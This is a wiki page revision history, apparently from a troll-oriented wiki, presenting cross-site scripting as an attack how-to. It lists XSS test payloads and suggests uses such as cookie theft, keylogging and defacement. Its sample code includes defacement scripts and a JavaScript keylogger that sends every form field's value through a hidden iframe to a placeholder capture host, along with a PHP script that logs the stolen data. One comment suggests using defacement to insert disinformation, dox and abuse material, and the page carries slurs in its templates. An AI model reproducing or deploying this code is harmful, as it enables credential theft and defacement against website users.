Cross Site Scripting - Revision history

imported>77551 anal: /* Entrypoints */ fixed type

2022-03-20T23:32:25Z

Entrypoints: fixed type

← Older revision		Revision as of 23:32, 20 March 2022
Line 15:		Line 15:
	Another way is like this		Another way is like this
	<pre><a href="javascript:alert(document.cookie);">link</a></pre>		<pre><a href="javascript:alert(document.cookie);">link</a></pre>
	But this requires your target to click a link		But this requires your target to click a link.

	==Things To Do==		==Things To Do==

imported>CrackRabbit: /* See Also */

2020-12-24T09:48:59Z

imported>Uberfukken at 00:47, 14 March 2019

2019-03-14T00:47:29Z

← Older revision		Revision as of 00:47, 14 March 2019
Line 82:		Line 82:
	{{SecurityFaggots}}		{{SecurityFaggots}}
	{{trolls}}		{{trolls}}
			{softwarez}}
	[[Category:Softwarez]]		[[Category:Softwarez]]

imported>Oddguy at 12:36, 23 March 2015

2015-03-23T12:36:53Z

← Older revision		Revision as of 12:36, 23 March 2015
(No difference)

imported>Oddguy at 12:36, 23 March 2015

2015-03-23T12:36:53Z

← Older revision	Revision as of 12:36, 23 March 2015
(No difference)

imported>Oddguy at 12:36, 23 March 2015

2015-03-23T12:36:53Z

← Older revision		Revision as of 12:36, 23 March 2015
(No difference)

imported>Oddguy at 12:36, 23 March 2015

2015-03-23T12:36:53Z

← Older revision		Revision as of 12:36, 23 March 2015
Line 1:		Line 1:
	{{FactAlert\|XSS is [[winrar]]. If you can pull it off, [[Masturbate\|pat yourself on the back]].}}		{{FactAlert\|XSS is [[winrar]]. If you can pull it off, [[Masturbate\|pat yourself on the back]].}}
	~~{{haxor}}~~
	[[File:Swissvpndefaced.png\|thumb\|right\|What XSS looks like]]		[[File:Swissvpndefaced.png\|thumb\|right\|What XSS looks like]]
	'''Cross site scripting''' (or XSS) is a method of [[Oh exploitable!\|exploiting]] a website that does not validate user supplied input or [[STD\|sanitize output]]. Web servers that fail to do so will allow you to run [[Last Measure\|arbitrary javascript]] on an end users browser.		'''Cross site scripting''' (or XSS) is a method of [[Oh exploitable!\|exploiting]] a website that does not validate user supplied input or [[STD\|sanitize output]]. Web servers that fail to do so will allow you to run [[Last Measure\|arbitrary javascript]] on an end users browser.
Line 79:		Line 79:
	* [[SQL Injection]]		* [[SQL Injection]]

			{{programming}}
	{{SecurityFaggots}}		{{SecurityFaggots}}
	{{trolls}}		{{trolls}}
	[[Category:Softwarez]]		[[Category:Softwarez]]

imported>Meepsheep at 02:09, 2 January 2012

2012-01-02T02:09:37Z

← Older revision		Revision as of 02:09, 2 January 2012
Line 1:		Line 1:

	{{FactAlert\|XSS is [[winrar]]. If you can pull it off, [[Masturbate\|pat yourself on the back]].}}		{{FactAlert\|XSS is [[winrar]]. If you can pull it off, [[Masturbate\|pat yourself on the back]].}}
	{{haxor}}		{{haxor}}
			[[File:Swissvpndefaced.png\|thumb\|right\|What XSS looks like]]
	'''Cross site scripting''' (or XSS) is a method of [[Oh exploitable!\|exploiting]] a website that does not validate user supplied input or [[STD\|sanitize output]]. Web servers that fail to do so will allow you to run [[Last Measure\|arbitrary javascript]] on an end users browser.		'''Cross site scripting''' (or XSS) is a method of [[Oh exploitable!\|exploiting]] a website that does not validate user supplied input or [[STD\|sanitize output]]. Web servers that fail to do so will allow you to run [[Last Measure\|arbitrary javascript]] on an end users browser.

imported>Unknown: Created page with " {{FactAlert|XSS is winrar. If you can pull it off, pat yourself on the back.}} {{haxor}} '''Cross site scripting''' (or XSS) is a method of [[Oh exploitable!..."

2011-04-16T02:43:39Z

Created page with " {{FactAlert|XSS is winrar. If you can pull it off, pat yourself on the back.}} {{haxor}} '''Cross site scripting''' (or XSS) is a method of [[Oh exploitable!..."

New page

{{FactAlert|XSS is [[winrar]]. If you can pull it off, [[Masturbate|pat yourself on the back]].}}
{{haxor}}

'''Cross site scripting''' (or XSS) is a method of [[Oh exploitable!|exploiting]] a website that does not validate user supplied input or [[STD|sanitize output]]. Web servers that fail to do so will allow you to run [[Last Measure|arbitrary javascript]] on an end users browser.

__TOC__

==Entrypoints==
XSS entrypoints are usually found in webforms & querystrings. You can test for the existence of xss by using the following string.
<pre><script>alert(document.cookie);</script></pre>

You also may be able to include javascript embedded in a flash object, or an image like so:
<pre><img src="javascript:alert(document,cookie);" /></pre>
But this varies between browsers.
Another way is like this
<pre><a href="javascript:alert(document.cookie);">link</a></pre>
But this requires your target to click a link

==Things To Do==
#Hijack user sessions/cookies
#*Since user session ID and occasionally usernames/passwords are stored in cookies, you can steal cookie data to impersonate a user by either finding their uname/pass or using their server session ID.
#Log Keystrokes
:*You can write some code in javascript to send data via ajax/iframes when a user presses a key.
#Deface pages
:*If the xss exploit you've discovered is saved into a database and redisplayed to other users, you can deface the page by overlaying content.

==Sample Code==
<pre>//---Javascript
//Overlay a black background with LOL in big white text
html='<div style="position:absolute;top:0px;left:0px;z-index:99;width:100%;height:100%;background-color:black;"><h1 style="color:#fff;">LOLHAI</h1></div>';
document.write(html);</pre>

<pre>//---Javascript
//Change the content of <body>
html='<h1>LOLHAI</h1>';
window.document.body.innerHTML=html;</pre>

<pre>//---Javascript
//You can study the structure of a site and change the content for any element ID or tag name
html='<h1>LOLHAI</h1>';
document.getElementById('element_id').innerHTML = html;
document.getElementsByTagName('element_tag')[child].innerHTML = html;
//This is epic for trolling by inserting typos, disinformation, dox, gore, cp, etc</pre>

<pre>//---Javascript
//This is an example of a keylogger. There is also a php file on this article you can use to capture the data.
randVal = 'loldongs'+(Math.round((10000-5000) * Math.random() + 5000));
wp='<div style=":display:block;width:0;height:0;z-index:0;overflow:hidden;" id="'+randVal+'"></div>';
window.onload=function(){
window.document.body.innerHTML='<div onkeyup="kl();">'+window.document.body.innerHTML+wp+'</div>';
}
function kl(){
inp=document.getElementsByTagName('input');
qs='';
for(var i = 0; i < inp.length; i++){
qs=qs+i+'_'+inp[i].name+'='+inp[i].value+'&';
}
cn=document.getElementById(randVal);
kf='<iframe style="width:0;height:0;" src="http://CAPTUREHOST/capture.php?'+qs+'"></iframe>';
cn.innerHTML=kf;
}</pre>

<pre>//---capture.php
//This will catch all data passed as querystrings and save them in a readable format with IP, referrer & timestamp
<?php
$dumpFile = "dump";
$fh = fopen($dumpFile, 'a') or die("can't open file");
fwrite($fh, date("m/d/y_g:i:s").'|'.$_SERVER['REMOTE_ADDR'].'|'.$_SERVER['HTTP_REFERER'].'|');
foreach($_GET as $qs => $val){
fwrite($fh, $qs."=".$val.'|');
}
fwrite($fh, "\n");
fclose($fh);
?></pre>

==See Also==
* [http://partyvan.info/wiki/Cross_site_scripting page this was copied from]
* [[Skiddie]]
* [[SQL Injection]]

{{SecurityFaggots}}
{{trolls}}
[[Category:Softwarez]]

← Older revision		Revision as of 09:48, 24 December 2020
Line 82:		Line 82:
	{{SecurityFaggots}}		{{SecurityFaggots}}
	{{trolls}}		{{trolls}}
	{softwarez}}		{{softwarez}}
	[[Category:Softwarez]]		[[Category:Softwarez]]